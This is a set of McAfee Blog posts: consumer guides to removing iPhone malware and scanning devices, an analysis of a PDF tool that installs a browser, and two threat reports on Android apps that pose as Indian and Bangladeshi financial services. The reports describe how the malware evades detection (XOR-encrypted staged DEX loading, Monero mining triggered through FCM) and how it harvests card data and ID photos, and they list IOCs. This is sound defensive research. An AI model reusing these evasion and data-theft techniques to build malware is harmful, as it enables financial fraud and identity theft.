    • Spyware: This malicious software sits on your device, tracks your online activities, then sends it to a central server controlled by third-party internet service providers, hackers, and scammers, who then exploit this information to their advantage.
    • Trojans: Disguised as a real, operational program, this type of malware steals passwords, PINs, credit card data, and other private information.

    Understanding Apple’s built-in security layers

    To keep you safe against malware and other threats, Apple engineers the iPhone with multiple security layers, including:

    • Secure Enclave: This hardware feature is a dedicated secure subsystem in Apple devices that protects your most sensitive data, such as Face ID or Touch ID information in a separate, fortified processor. 
    • Sandboxing: This process serves as a digital wall around each app, preventing it from meddling with other apps or accessing your core iOS system files. A downloaded app is first isolated or sandboxed to prevent it from accessing data in your iPhone or modifying the operating system. 
    • App Store review: Apple also enforces a process to strictly vet apps for malicious code, and it delivers rapid security patches via regular iOS updates to fix vulnerabilities quickly. 

    Together, these features create a highly secure environment for iPhones. However, this robust shield does not eliminate all risks, as threats can still bypass these defenses through phishing scams or by tricking a user into installing a malicious configuration profile.

    6 signs of malware on your iPhone and quick actions

    If your iPhone is exhibiting these odd activities listed below, a manual scan is your first point of order. These quick actions are free to do as they are already integrated into your device.

    • Sudden battery drain: Your battery dies much faster than it should because malware is secretly running in the background. It could mean malware is running in the background and consuming a significant amount of power. To make sure that no such apps are installed on your phone, head over to Settings > Battery and select a period of your choice. Uninstall any unfamiliar apps that stand out.
    • Unexpected data spikes: You notice a sudden jump in your data usage, which could mean malware is sending information from your phone to a hacker’s server. Keep an eye on it if you suspect malware is in your system. To do so, go to Settings > Mobile Data and check if your data usage is higher than usual.
    • Constant pop-ups: Occasionally running into pop-up ads is inevitable when browsing the internet. However, your phone might be infected with adware if you’re getting them with alarming frequency. Never click the pop-ups. Instead, go to Settings > Safari and tap Clear History and Website Data. This can remove adware and reset your browser.
    • Overheating device: Your iPhone feels unusually hot, even when idle, as malicious software can cause the processor to work overtime. Restart your phone to terminate any hidden processes causing the issue.
    • Mysterious apps appear: You discover apps on your iPhone that you are certain you never downloaded. Take some time to swipe through all of your apps and closely inspect or uninstall any that you don’t recognize or remember downloading. 
    • Sluggish performance: Your phone becomes slow, apps crash unexpectedly, or the entire system freezes for no reason. A simple restart can often clear up performance issues and improve responsiveness.

    The disadvantage of doing a manual scan is that it requires effort. In addition, it does not detect sophisticated malware, and only identifies symptoms rather than root causes.

    Scan your iPhone for malware

    If your iPhone persistently exhibits any of the red flags above despite your quick actions, you may have to investigate using a third-party security app to find the threats that manual checks don’t catch. 

    Compared with manual or built-in scans, third-party solutions like McAfee Mobile Security offer automated, comprehensive malware scans by detecting a wider range of threats before they enter your digital space. While available at a premium, third-party security suites offer great value as they include full-scale protection that includes a safe browsing feature to protect your digital life and a virtual private network (VPN) for a more secure internet connection. 

    How to remove malware from your iPhone

    If the scan confirms the presence of malware on your iPhone, don’t worry. There’s still time to protect yourself and your data. Below is an action plan you can follow to remove malware from your device.

    Update your iOS, if applicable

    In many cases, hackers exploit outdated versions of iOS to launch malware attacks. If you don’t have the latest version of your operating system, it’s a good idea to update your iOS immediately to close this potential vulnerability. To do this, go to Settings > General > Software Update and follow the instructions to update your iPhone.

    Restart your device

    It might sound simple, but restarting your device can fix certain issues. The system will restart on its own when updating the iOS. If you already have the latest version, restart your iPhone now.

    Clear your iPhone browsing history and data

    If updating the iOS and restarting your device didn’t fix the issue, try clearing your phone’s browsing history and data. If you’re using Safari, go to Settings > Clear History and Website Data > Clear History and Data. Keep in mind that the process is similar for Google Chrome and most other popular web browsers.

    Remove any suspicious apps

    Malicious software, such as spyware and ransomware, often end up on phones by masquerading as legitimate apps. To err on the side of caution, delete any apps that you don’t remember downloading or installing.

    Restore your iPhone

    The option to restore to a previous backup is one of the most valuable features found on the iPhone and iPad. This allows you to restore your device to an iCloud backup version that was made before the malware infection. Go to Settings > General > Transfer or Reset iPhone > Erase All Content and Settings > Restore from iCloud Backup.

    Factory reset your iPhone

    A factory reset should be your last resort when other removal methods have failed, as it is a complete data wipe. That means it will erase all content and settings, including any malicious apps, profiles, or files, returning the software to its original, out-of-the-box state. That’s why it’s crucial to back up your essential data such as photos and contacts first. Also, remember to restore to an iCloud backup version *before* the malware infection to avoid reintroducing the infection. For the highest level of security, set the iPhone up as new and manually redownload trusted apps from the App Store. When you are ready to reset, go to Settings > General > Transfer or Reset iPhone > Erase All Content and Settings > Set Up as New iPhone.

    How to detect spyware on your iPhone

    Spyware is designed to be sneaky, but it leaves subtle traces. Pay attention to your iPhone’s behavior, such as the camera or microphone unexpectedly activating as indicated by a green or orange dot in the status bar, sudden battery drain, or your device overheating for no reason. Another major red flag is a spike in data usage when you aren’t actively using your phone.

    For a deeper look, do this 5-minute check to see which apps have accessed your data, camera, and microphone. Look for any activity that seems suspicious or that you don’t recall authorizing. 

    5-minute spyware check:

    • Scan for unknown apps: Scroll through your home screens and App Library for any apps you didn’t install.
    • Review the App Privacy Report: Check for recent sensor or network activity from apps that shouldn’t be active. Go to Settings > Privacy & Security > App Privacy Report
    • Check for unusual profiles: Go to Settings > General > VPN & Device Management. Remove any profiles you don’t recognize.
    • Look at battery usage: In Settings > Battery, look for unfamiliar apps consuming significant power.

    Removing spyware from your iPhone

    If you suspect your iPhone has been compromised, it’s important to act quickly. Here’s a step-by-step process to remove it, restore your privacy, and prevent future threats.

    1. Backup your essential data: Before making any changes, back up your photos, contacts, and other important files. Ensure you back up to a trusted location like iCloud or your computer.
    2. Update to the latest iOS: Apple frequently releases security patches. Go to Settings > General > Software Update and install any available updates to close vulnerabilities that spyware might exploit.
    3. Delete suspicious apps and profiles: Remove any apps you don’t recognize. Additionally, go to Settings > General > VPN & Device Management and delete any configuration profiles that you did not install yourself.
    4. Change your passwords: Once your device is clean, immediately change the passwords for your critical accounts, including your Apple ID, email, and banking apps.
    5. Enable two-factor authentication (2FA): For an added layer of security, enable 2FA on all important accounts, to make it much harder for anyone to gain unauthorized access, even if they have your password.
    6. Run a mobile security scan: The most reliable way to detect spyware is with a trusted mobile security app that can perform a comprehensive system scan to help flag any remaining malicious files or settings.
    7. When to escalate: If you suspect you are a victim of stalking or that your device was compromised for illegal activities, contact Apple Support for assistance and consider reporting the incident to law enforcement.

    Don’t engage with fake virus pop-up scams

    A common tactic used by scammers is the fake virus pop-up. These alarming messages appear while you are browsing, often using logos from Apple or other trusted companies, and claim your iPhone is infected. Their goal is to create panic, urging you to click a link, download a fake app, or call a fraudulent support number. Never interact with these pop-ups. Here’s a quick response plan when dealing with fake virus pop-up ads: 

    • The correct action is to close the Safari tab or the entire browser immediately. 
    • To be safe, clear your browsing data by going to Settings > Safari > Clear History and Website Data. This action removes any lingering scripts from the malicious page. 
    • You can also report phishing pages to help protect others.

    Never enter personal information, passwords, or payment details on a page that appears from a pop-up ad.

    Avoid malware from the start

    The best way to protect your iOS device is to avoid malware in the first place. Follow these security measures to safeguard your device:

    • If you receive unexpected or unsolicited emails or texts, think before you tap the suspicious links to avoid phishing traps.
    • Stick only with apps from the Apple App store. Avoid installing apps from unvetted third-party stores.
    • Protect your device’s built-in defenses by avoiding the temptation to jailbreak your iPhone as this will remove most Apple security features.
    • Enable automatic updates of iOS and iTunes to stay in line with Apple’s security updates and bug fixes.
    • Back up your iPhone data regularly to iCloud or a computer so you can always restore it.
    • Avoid engaging with suspicious text messages on iMessage, as hackers use them to spread phishing scams.
    • Enable two-factor authentication on your Apple ID for a powerful extra layer of security.
    • Routinely review your app permissions to ensure they only have access to necessary data.
    • Install a trusted security app, such as McAfee Mobile Security, for proactive scanning and web protection.

    FAQs about iPhone malware

    Can my iPhone get a virus from opening an email?
    Simply opening an email is very unlikely to infect your iPhone. However, clicking a malicious link or downloading an attachment from a phishing email can lead you to a harmful website or trick you into compromising your information. It’s the action you take, not opening the email itself, that creates the risk.

    How do I know if a virus warning is real or fake?
    Any pop-up in your browser that claims your iPhone has a virus is fake. Apple does not send notifications like this. These are scare tactics designed to trick you into clicking a link or calling a fake support number. The safest response is to close the browser tab and clear your browsing data.

    Does my iPhone really need antivirus software?

    It’s a misconception that iPhones are immune to all viruses. While Apple’s built-in security provides a strong defense, it doesn’t offer complete protection. Cybercriminals are increasingly using phishing, smishing, AI voice cloning, deepfake videos and other social engineering methods to target iPhone users. A comprehensive security app provides layered protection beyond the iOS integrated security. Think of it as adding a professional security guard to already-strong walls.

    What is the best way to check my iPhone for a virus or malware for free?
    You can perform manual checks for free by looking for suspicious apps, checking for unusual battery drain and data usage, and reviewing your App Privacy Report. While helpful for spotting obvious issues, these manual checks aren’t foolproof. A dedicated security app offers a more reliable and thorough analysis.

    Can an iPhone get malware without jailbreaking it?
    Yes. While jailbreaking significantly increases the risk, malware can still infect a non-jailbroken iPhone. This typically happens through sophisticated phishing attacks, installing malicious configuration profiles from untrusted sources, or, in very rare cases, by exploiting an unknown vulnerability in iOS, known as a “zero-day” attack.

    Is an iPhone malware scan truly necessary?
    Given the value of the personal data on our phones, a regular malware scan provides significant peace of mind. A reputable security app can identify vulnerabilities you might miss, such as outdated software or risky system settings, helping you maintain a strong security posture.

    Final thoughts on iPhone malware protection

    Keeping your iPhone secure from malware is an achievable goal that puts you in control of your digital safety. By combining smart habits with powerful security tools, you can confidently protect your personal information from emerging threats. 

    McAfee is committed to empowering you with the resources and protection needed to navigate the online world safely. McAfee Mobile Security provides full protection against various types of malware targeting the Apple ecosystem. With safe browsing features, a secure VPN, and antivirus software, McAfee Security for iOS delivers protection against emerging threats, so you can continue to use your iPhone with peace of mind. Download the McAfee Mobile Security app today and get all-in-one protection.

    The post A Guide to Remove Malware From Your iPhone appeared first on McAfee Blog.

    Think Before You Click: EPI PDF’s Hidden Extras

    By: McAfee Labs

    Authored by: Anuradha & Prabudh

    PDF converting software can be super helpful. Whether you’re turning a Word document into a PDF or merging files into one neat package, these tools save time and make life easier.

    But here’s something many people don’t realize — some of these free PDF tools come with hidden baggage. When you install them, they might also sneak in a new search engine, browser extension, or change your homepage without clearly asking for permission. 

    What’s Going On?

    Some PDF software is bundled with extra programs. That means when you download and install the PDF converter, it may also install:

    • A new search engine in your browser
    • Toolbars or browser extensions
    • Apps that run in the background on your computer

    Most of the time, these are not viruses, but they can slow down your computer, change your browsing experience, and even collect your data.

    Geographical Customer Prevalence

    The heat map below illustrates the prevalence of EPI PDF software in the field in Q2, 2025.

    We see that the top country encountering this software is the United States of America with over 118,000 McAfee device encounters.

    Why Do They Do This?

    Many free software companies make money by including these extras. Other companies pay them to promote their search tools or browser extensions. It’s a way for them to earn something in return for offering the software for free.

    During our daily hunt at McAfee to secure our customer, we came across one such bundler application called EPI PDF Editor that clearly had deceptive nature towards the end user.

    Key Takeaways:

    1. Read Before You Click “Next”
      Always take a moment during installation to read what each screen says. Look for checkboxes that let you “opt out” of installing extra software.
    2. Choose “Custom” or “Advanced” Installation
      This gives you more control over what gets installed on your computer.
    3. Download From Trusted Sources
      Stick to well-known websites or the official site of the PDF software. Avoid shady download links from ads or pop-ups.
    4. Use Built-In Tools
      Many operating systems (like Windows or macOS) already have simple PDF features like printing to PDF or viewing files, so you might not need extra software at all.
    5. Check Your Browser
      If your homepage suddenly changes or you see a new search engine, go to your browser settings and change it back.

    McAfee researches such applications proactively, and we review the EULA and Privacy Policy regularly for new applications.

    Technical Analysis

    EPI PDF Editor is distributed as an MSI installer. Upon launching, the installer window includes a pre-selected option to “Import your current browser settings into EPI PDF,” a choice that appears unrelated to the tool’s intended purpose of handling PDF documents. Unless the user actively opts out by unchecking the box, this action will continue automatically.

    Installer Branding Mismatch

    The installer is branded as “PDF Converter,” indicating that it is designed for typical PDF tasks such as viewing, converting, splitting, merging, and watermarking documents. However, the inclusion of an opt-out option to import browser settings raises questions about the application’s true functionality.

    Figure 1: Import browser settings

    Privacy Policy Conflict

    A closer examination of the software’s Privacy Policy and Terms reveals a deceptive practice at play. Although the application is marketed as a PDF Converter, the legal documentation tells a different story. As shown in Figure 2, the Privacy Policy of the program—branded as EPIbrowser—explicitly defines the software as a browser designed for Windows-based devices. The screenshot displays both the EPIbrowser logo and the policy text, clearly indicating that the user is not installing a PDF tool, but rather a web browser disguised as one.

    Figure 2: Application name in terms & conditions

    Figure 3: Application meaning in terms

     

    McAfee’s *PUP Policy states that Software installers must provide software licensing information prior to installing any bundled components.No ‘installation completed’ window pops up but instead, a chromium-based browser opens with a tab opened that too with deceptive behavior i.e. options are present to edit the opened pdf but no action being performed. We can browse the internet by opening other tabs.

    Figure 4: Tab in EPI Browser

    McAfee PUP policy violated here is, ”Installation: whether the user can make an informed decision about the software installation or add-ons and can adequately back out of any undesired installations.” Another suspicious behavior observed is install location i.e. from ‘Appdata/Temp’ instead of Program Files or Program Files(x86). Further while checking control panel we found that sample has created the entry with EPI Browser only and can be uninstalled. Due to its deceptive behavior, which aligns with the McAfee violation criteria, this application has been classified as a Potentially Unwanted Program (PUP).

    The McAfee WebAdvisor browser extension warns users when attempting to navigate to websites known to distribute PUPs.

    Figure 5: McAfee Web Advisor Warning

    Bottom Line

    Free PDF tools are useful — but be aware of what else might come with them. A few extra minutes of reading can save you from hours of frustration later. ✅

    Stay smart. Stay safe. And always know what you’re really installing.

    Indicator of Compromise

    App Name  Distributed in different file names  SHA256 
    EPI PDF Editor   viewpdftools.msi  c2d1ac2511eb2749cdc7ae889d484c246d3bd1e740725dc4dd2813c4b4d05c7b 
    onestartpdfdirect.msi 
    PDFSmartKit.msi 
    pdfzonepro.msi 
    6c9136.msi 
    OneStartPDF-v4.5.282.2.msi 

    In a digital world where convenience often comes at a hidden cost, it’s crucial to be vigilant about the software we install — especially free tools like PDF converters. As the case of EPI PDF Editor highlights, not all applications are what they claim to be. Deceptive installations, hidden browser hijackers, and unauthorized data collection can compromise both your privacy and your device’s performance. By staying informed and cautious — reading installation prompts, choosing advanced options, and relying on trusted sources — you can protect yourself from potentially unwanted programs and avoid falling into these traps.

    At McAfee, our goal is to help users stay one step ahead of deceptive software. Awareness is your first line of defense. So, the next time you download a free tool, take a moment to think before you click. Because what seems like a simple installation could be opening the door to much more.

     

    *PUP :- PUP stands for Potentially Unwanted Program that are used to deliver users some unwanted applications like ads, browser addon, search engine modification, extra programs that a user is generally using for daily purpose.

    The post Think Before You Click: EPI PDF’s Hidden Extras appeared first on McAfee Blog.

    Android Malware Targets Indian Banking Users to Steal Financial Info and Mine Crypto

    By: McAfee Labs

    Authored by Dexter Shin

    McAfee’s Mobile Research Team discovered a new Android malware campaign targeting Hindi-speaking users, mainly in India. The malware impersonates popular Indian financial apps, including SBI Card, Axis Bank, and IndusInd Bank, and is distributed through phishing websites that are continuously being created. What makes this campaign unique is its dual-purpose design: it steals personal and financial information while also silently mining Monero cryptocurrency using XMRig, which is triggered via Firebase Cloud Messaging (FCM). It also abuses user trust by pretending to be a legitimate app update from Google Play.

    McAfee, as part of the App Defense Alliance committed to protecting users and the app ecosystem, reported the identified malicious apps to Google. As a result, Google blocked the associated FCM account to prevent further abuse. Also, McAfee Mobile Security detects all of these apps as High-Risk threats. For more information, visit McAfee’s Mobile Security page.

    This campaign targets Indian users by impersonating legitimate financial services to lure victims into installing a malicious app. This is not the first malware campaign targeting Indian users. In the past, McAfee has reported other threats. In this case, the attackers take it a step further by using real assets from official banking websites to build convincing phishing pages that host the malware payload. The app delivered through these phishing sites functions as a dropper, meaning it initially appears harmless but later dynamically loads and executes the actual malicious payload. This technique helps evade static detection and complicates analysis.

    Apart from delivering a malicious payload, the malware also mines cryptocurrency on infected mobile devices. When the malware receives specific commands via FCM, it silently initiates a background mining process for Monero (XMR). Monero is a privacy-focused cryptocurrency that hides transaction addresses, sender and receiver identities, and transaction amounts. Because of these privacy features, cybercriminals often use it to stay hidden and move illegal money without getting caught. Its mining algorithm, RandomX, is optimized for general-purpose CPUs, making it possible to mine Monero efficiently even on mobile devices.

    Technical Findings

    Distribution Methods

    The malware is distributed through phishing websites that impersonate Indian financial services. These sites are designed to closely resemble official banking sites and trick users into downloading a fake Android app. Here are some phishing sites we found during our investigation.

    Figure 1. Screenshot of a phishing website

     

    These phishing pages load images, JavaScript, and other web resources directly from the official websites to appear legitimate. However, they include additional elements such as “Get App” or “Download” buttons, which prompt users to install the malicious APK file.

    Dropper Analysis

    When the app is launched, the first screen the user sees looks like a Google Play Store page. It tells the user that they need to update the app.

    Figure 2. The initial screen shown by the dropper app

    The app includes an encrypted DEX file stored in the assets folder. This file is not the actual malicious payload, but a loader component. When the app runs, it decrypts this file using XOR key and dynamically loads it into memory. The loaded DEX file contains custom code, including a method responsible for loading additional payloads.

    Figure 3. First-stage encrypted loader DEX and XOR key

    Once the first-stage DEX is loaded, the loader method inside it decrypts and loads a second encrypted file, which is also stored in the assets. This second file contains the final malicious payload. By splitting the loading process into two stages, the malware avoids exposing any clearly malicious code in the main APK and makes static analysis more difficult.

    Figure 4. Second-stage malicious payload loaded by Loader class

    Once this payload is loaded, the app displays a fake financial interface that looks like a real app. It prompts the user to input sensitive details such as their name, card number, CVV, and expiration date. The collected information is then sent to the attacker’s command-and-control (C2) server. After submission, the app shows a fake card management page with messages like “You will receive email confirmation within 48 hours,” giving the false impression that the process is ongoing. All features on the page are fake and do not perform any real function.

     

    Figure 5. Fake card verification screen

    Monero Mining Process

    As mentioned earlier, one of this campaign’s key features is its hidden cryptomining functionality. The app includes a service that listens for specific FCM messages, which trigger for start of the mining process.

     

    Figure 6. Firebase messaging service is declared in the manifest.

     

    In the second-stage dynamically loaded code, there is a routine that attempts to download a binary file from external sources. The malware contains 3 hardcoded URLs and tries to download the binary from all of them.

    Figure 7. Hardcoded URLs used by the malware to download a binary file

     

    The downloaded binary is encrypted and has a .so extension, which usually indicates a native library. However, instead of loading it normally, the malware uses ProcessBuilder, a Java class for running external processes, to directly execute the file like a standalone binary.

    Figure 8. Executing downloaded binary using ProcessBuilder

    What’s particularly interesting is the way the binary is executed. The malware passes a set of arguments to the process that exactly match the command-line options used by XMRig, an open-source mining tool. These include specifying the mining pool server and setting the target coin to Monero.

    Figure 9. XMRig-compatible arguments passed to the mining process

     

    When the decrypted binary is executed, it displays log messages identical to those produced by XMRig. In summary, this malware is designed to mine Monero in the background on infected devices when it receives specific FCM messages.

    Figure 10. Decrypted binary showing XMRig log messages

    Recommendations and Conclusion

     

    Figure 11. Geographic distribution of infected devices

    Telemetry shows that most infections are concentrated in India, which aligns with the campaign’s use of Hindi language and impersonation of Indian financial apps. A small number of detections were also observed in other regions, but these appear to be limited.

    What makes this campaign notable is its dual-purpose design, combining financial data theft with background cryptomining, triggered remotely via Firebase Cloud Messaging (FCM). This technique allows the malware to remain dormant and undetected until it receives a specific command, making it harder for users and defenders to detect.

    To stay protected, users are strongly advised to download apps only from trusted sources such as Google Play, and to avoid clicking on links received through SMS, WhatsApp, or social media—especially those promoting financial services. It is also important to be cautious when entering personal or banking information into unfamiliar apps. In addition, using a reliable mobile security solution that can detect malicious apps and block phishing websites can provide an added layer of protection against threats like this.

    Indicators of Compromise (IOCs)

    Type  Value  Description 
    APK  2c1025c92925fec9c500e4bf7b4e9580f9342d44e21a34a44c1bce435353216c  SBI Credit Card 
    APK  b01185e1fba96209c01f00728f6265414dfca58c92a66c3b4065a344f72768ce  ICICI Credit Card 
    APK  80c6435f859468e660a92fc44a2cd80c059c05801dae38b2478c5874429f12a0  Axis Credit Card 
    APK  59c6a0431d25be7e952fcfb8bd00d3815d8b5341c4b4de54d8288149090dcd74  IndusInd Credit Card 
    APK  40bae6f2f736fcf03efdbe6243ff28c524dba602492b0dbb5fd280910a87282d  Kotak Credit Card 
    URL  https[://]www.sbi.mycardcare.in  Phishing Site 
    URL  https[://]kotak.mycardcard.in  Phishing Site 
    URL  https[://]axis.mycardcare.in  Phishing Site 
    URL  https[://]indusind.mycardcare.in  Phishing Site 
    URL  https[://]icici.mycardcare.in  Phishing Site 
    Firebase  469967176169  FCM Account 

     

     

    The post Android Malware Targets Indian Banking Users to Steal Financial Info and Mine Crypto appeared first on McAfee Blog.

    Fake Android Money Transfer App Targeting Bengali-Speaking Users

    By: McAfee Labs

    Authored by Dexter Shin

    McAfee’s Mobile Research Team discovered a new and active Android malware campaign targeting Bengali-speaking users, mainly Bangladeshi people living abroad. The app poses as popular financial services like TapTap Send and AlimaPay. It is distributed through phishing sites and FacebookFacekbook pages, and the app steals users’ personal and financial information. The campaign remains highly active, with the command-and-control (C2) server operational and connected to multiple evolving domains. While the attack techniques are not new, the campaign’s cultural targeting and sustained activity reflect how cybercriminals continue to adapt their strategies to reach specific communities. McAfee Mobile Security already detects this threat as Android/FakeApp. For more information, visit McAfee Mobile Security.

    Bangladeshi people living abroad, particularly in countries such as Saudi Arabia, the UAE, Malaysia, and the UK, rely heavily on mobile money services to send remittances and verify their identities for various purposes. Services like bKash, TapTap Send, and AlimaPay are widely used and trusted within this community.

    In 2024, annual remittances sent to Bangladesh reached nearly $26.6 billion, ranking sixth globally and third in South Asia. This massive flow of cross-border funds highlights the economic importance and digital engagement of the Bangladeshi diaspora.

     

    Figure 1. Top Recipients of Remittances in 2024 (Source: World Bank)

     

    As more people use mobile financial apps, cybercriminals are finding new ways to trick them using fake apps and phishing websites. Many users trust apps shared by friends or family, and some may not know how to spot scams. This makes them easy targets for attackers.

    In May 2025, McAfee’s Mobile Research Team identified a malware campaign designed to exploit these conditions. The fake Android app impersonates well-known money transfer services and steals personal information such as the user’s name, email address, phone number, and photo ID (such as a passport or national ID card). It also attempts to collect financial data like card numbers through fake in-app pages. Moreover, the C2 server’s storage is publicly exposed, meaning that the stolen data can be accessed by anyone, which significantly increases the risk of abuse.

    Technical Findings

    Distribution Methods

    Over the past few weeks, these fake apps have continued to appear, suggesting an active and sustained campaign targeting Bengali-speaking users. These apps are primarily distributed through phishing websites that mimic trusted remittance services, often shared via fake Facebook pages.

    Figure 2. Screenshot of a phishing website

     

    The page is written entirely in Bengali, mimicking a legitimate remittance service commonly used by Bangladeshi expatriates. Below is a translated excerpt of the main message shown on the landing page:

    Bengali (original):

    আসসালামু আলাইকুম।

    প্রবাসী ভাইদের জন্য সুখবর। যারা কাজের পাশাপাশি বাড়তি আয় করতে চান, তারা বিকাশ, ফ্ল্যাশলোড ব্যবসা করতে পারেন। সম্পূর্ণ বৈধ উপায়ে। আপনার হাতের মধ্যে রয়েছে মোবাইলের মাধ্যমে। মোবাইল ব্যাংকিং করুন খুব সহজেই।

    English (translation):

    Peace be upon you.

    Good news for our brothers living abroad. If you’re looking to earn extra income along with your job, you can do business with bKash or FlashLoad in a completely legal way. Everything is within your reach through mobile. Mobile banking is very easy.

    In addition to phishing websites, the attackers also created fake Facebook pages that closely resemble legitimate remittance services. These pages often reuse official logos, promotional images, and even videos taken from real financial platforms to appear trustworthy. However, the site links on these pages point to phishing websites hosting the malicious app.

    Figure 3. Fake Facebook page mimicking a legitimate remittance service

    Fake App Analysis

    Once installed, the fake app immediately presents an interface that closely resembles a legitimate remittance application. It supports both Bengali and English language options and shows realistic-looking exchange rates.

    Figure 4. Initial UI of the fake TapTap Send app

    Users can select from a list of countries with large Bangladeshi expatriate populations, such as Maldives, Dubai, Oman, Saudi Arabia, Malaysia, Canada, and India, to simulate money transfers to Bangladeshi Taka (BDT). These details are likely included to establish trust and make the app appear functional. However, these screens serve as bait to encourage users to proceed with account creation and enter personal information. As users continue through the registration flow, the app requests increasingly sensitive data in multiple stages. First, it requests the user’s email address and full name. Then, it prompts them to select their country of residence and provide a valid mobile number. Next, users are asked to choose an account type, either “Personal” or “Agent”, a distinction commonly seen in real remittance platforms.

    Figure 5. Multi-step registration flow (1)

     

    Following this, the app reaches its most sensitive stage: it asks the user to take and upload a photo of an official ID, such as a passport, national ID (NID), or an e-commerce verification photo. This request is made in the local language and framed as a requirement to complete account setup. After uploading the ID, users are then asked to create a login password and a 5-digit PIN, just like real financial apps. This step makes the app feel more trustworthy and secure, but the collected credentials could later be used in credential stuffing attacks. All of this information is sent to the C2 server and stored, making it available for future fraud or identity theft.

     

    Figure 6. Multi-step registration flow (2)

     

    After completing the registration process, users are taken to a fully designed dashboard. The interface mimics a real financial or remittance app, complete with icons for money transfer, bill payment, mobile banking, and even customer support features.

     

    Figure 7. The fake TapTap Send app’s main dashboard

     

    The malware includes multiple fake transaction interfaces. These screens simulate mobile money transfers, bill payments, and bank transfers using logos from real services. Although no actual transaction is performed, the app collects all entered information such as phone numbers, account details, PINs, and payment amounts. This data is then transmitted to the C2 server.

    Figure 8. Fake transaction screens that imitate real financial services

     

    C2 Server and Data Exfiltration

    All the information collected by the fake app, including credentials, contact details, and photo IDs, is stored on the C2 server. However, the server lacks basic security settings. Directory listing is enabled, which means anyone can access the uploaded files without authentication. During our investigation, we found that one of the C2 domains contained 297 image files. These files appear to be photo IDs uploaded by users during the registration process.

     

    Figure 9. Publicly accessible directory listing on the C2 server

     

    These ID images include highly sensitive personal information and are publicly accessible. If downloaded or misused, they could pose a serious privacy and identity theft risk.

     

     

    Figure 10. Example of a sensitive photo ID image uploaded during app registration

     

     

    Figure 11. Geographic distribution of infected devices

    As expected, telemetry shows activity in countries with large Bangladeshi populations abroad, such as Saudi Arabia, Malaysia, Bangladesh, and the United Arab Emirates. This aligns with the app’s targeting of Bengali-speaking users through culturally familiar language and visuals. The campaign remains active, with new phishing domains and variants continuing to appear. Given the evolving nature of this threat and its use of trusted platforms like Facebook to distribute malicious content, users should stay cautious when encountering financial service promotions through social media or unknown websites. We recommend downloading apps only from trusted sources such as Google Play, avoiding links shared via social media, and being extra careful when asked to provide personal or banking information. Using mobile security software that can detect and block these threats is also strongly advised.

    Indicators of Compromise (IOCs)

     

    The post Fake Android Money Transfer App Targeting Bengali-Speaking Users appeared first on McAfee Blog.

    How to Scan for Viruses and Confirm Your Device Is Safe

    By: McAfee

    New online threats emerge every day, putting our personal information, money and devices at risk. In its 2024 Internet Crime Report, the Federal Bureau of Investigation reports that 859,532 complaints of suspected internet crime—including ransomware, viruses and malware, data breaches, denials of service, and other forms of cyberattack—resulted in losses of over $16 billion—a 33% increase from 2023.

    That’s why it is essential to stay ahead of these threats. One way to combat these is by conducting virus scans using proven software tools that constantly monitor and check your devices while safeguarding your sensitive information. In this article, we’ll go through everything you need to know to run a scan effectively to keep your computers, phones and tablets in tip-top shape.

    What does a virus scan do?

    Whether you think you might have a virus on your computer or devices or just want to keep them running smoothly, it’s easy to do a virus scan.

    Each antivirus program works a little differently, but in general the software will look for known malware with specific characteristics, as well as their variants that have a similar code base. Some antivirus software even checks for suspicious behavior. If the software comes across a dangerous program or piece of code, the antivirus software removes it. In some cases, a dangerous program can be replaced with a clean one from the manufacturer.

    Unmistakeable signs of a virus in your device

    Before doing a virus scan, it is useful to know the telltale signs of viral presence in your device. Is your device acting sluggish or having a hard time booting up? Have you noticed missing files or a lack of storage space? Have you noticed emails or messages sent from your account that you did not write? Perhaps you’ve noticed changes to your browser homepage or settings? Maybe you’re seeing unexpected pop-up windows, or experiencing crashes and other program errors. These are just some signs that your device may have a virus, but don’t get too worried yet because many of these issues can be resolved with a virus scan.

    Are free virus scanner tools safe and sufficient?

    Free virus scanner tools, both in web-based and downloadable formats, offer a convenient way to perform a one-time check for malware. They are most useful when you need a second opinion or are asking yourself, “do I have a virus?” after noticing something suspect.

    However, it’s critical to be cautious. For one, cybercriminals often create fake “free” virus checker tools that are actually malware in disguise. If you opt for free scanning tools, it is best to lean on highly reputable cybersecurity brands. On your app store or browser, navigate to a proven online scanning tool with good reviews or a website whose URL starts with “https” to confirm you are in a secure location.

    Secondly, free tools are frequently quite basic and perform only the minimum required service. If you choose to go this path, look for free trial versions that offer access to the full suite of premium features, including real-time protection, a firewall, and a VPN. This will give you a glimpse of a solution’s comprehensive, multi-layered security capability before you commit to a subscription.

    Cloud-based virus solutions

    If safeguarding all your computers and mobile devices individually sounds overwhelming, you can opt for comprehensive security products that protect computers, smartphones and tablets from a central, cloud-based hub, making virus prevention a breeze. Many of these modern antivirus solutions are powered by both local and cloud-based technologies to reduce the strain on your computer’s resources.

    Online virus scan: A step-by-step guide

    This guide will walk you through the simple steps to safely scan your computer using reliable online tools, helping you detect potential threats, and protect your personal data.

    1. Choose a trusted provider

    When selecting the right antivirus software, look beyond a basic virus scan and consider these key features:

    • Real-time protection. This is paramount, as it actively blocks threats before they can execute.
    • An effective solution must also have a minimal performance impact so it doesn’t slow down your device.
    • Look for a program with an intuitive interface that makes it easy to schedule scans and manage settings.
    • The best protection goes beyond a simple virus detector. It should include features such as a firewall, a secure VPN for safe browsing, and identity protection.
    • Look for reliable brands with positive reviews and clear privacy policies, and that provide a powerful virus scanner and proactive protection for both Android and iOS devices.

    2. Initiate the scan

    The process of checking for viruses depends on the device type and its operating system. Generally, however, the virus scanner will display a “Scan” button to start the process of checking your system’s files and apps.

    Here are more specific tips to help you scan your computers, phones and tablets:

    On a Windows computer

    If you use Windows 11, go into “Settings” and drill down to the “Privacy & Security > Windows Security > Virus & Threat Protection” tab, which will indicate if there are actions needed. This hands-off function is Microsoft’s own basic antivirus solution called Windows Defender. Built directly into the operating system and enabled by default, this solution provides a baseline of protection at no extra cost for casual Windows users. However, Microsoft is the first to admit that it lags behind specialized paid products in detecting the very latest zero-day threats.

    On a Mac computer

    Mac computers don’t have a built-in antivirus program, so you will have to download security software to do a virus scan. As mentioned, free antivirus applications are available online, but we recommend investing in trusted software that is proven to protect you from cyberthreats.

    If you decide to invest in more robust antivirus software, running a scan is usually straightforward and intuitive. For more detailed instructions, we suggest searching the software’s help menu or going online and following their step-by-step instructions.

    On smartphones and tablets

    Smartphones and tablets are powerful devices that you likely use for nearly every online operation in your daily life from banking, emailing, messaging, connecting, and storing personal information. This opens your mobile device to getting infected through malicious apps, especially those downloaded from unofficial stores, phishing links sent via text or email, or by connecting to compromised wi-fi networks.

    Regular virus scans with a mobile security software are crucial for protecting your devices. Be aware, however, that Android and IOS operating systems merit distinct solutions.

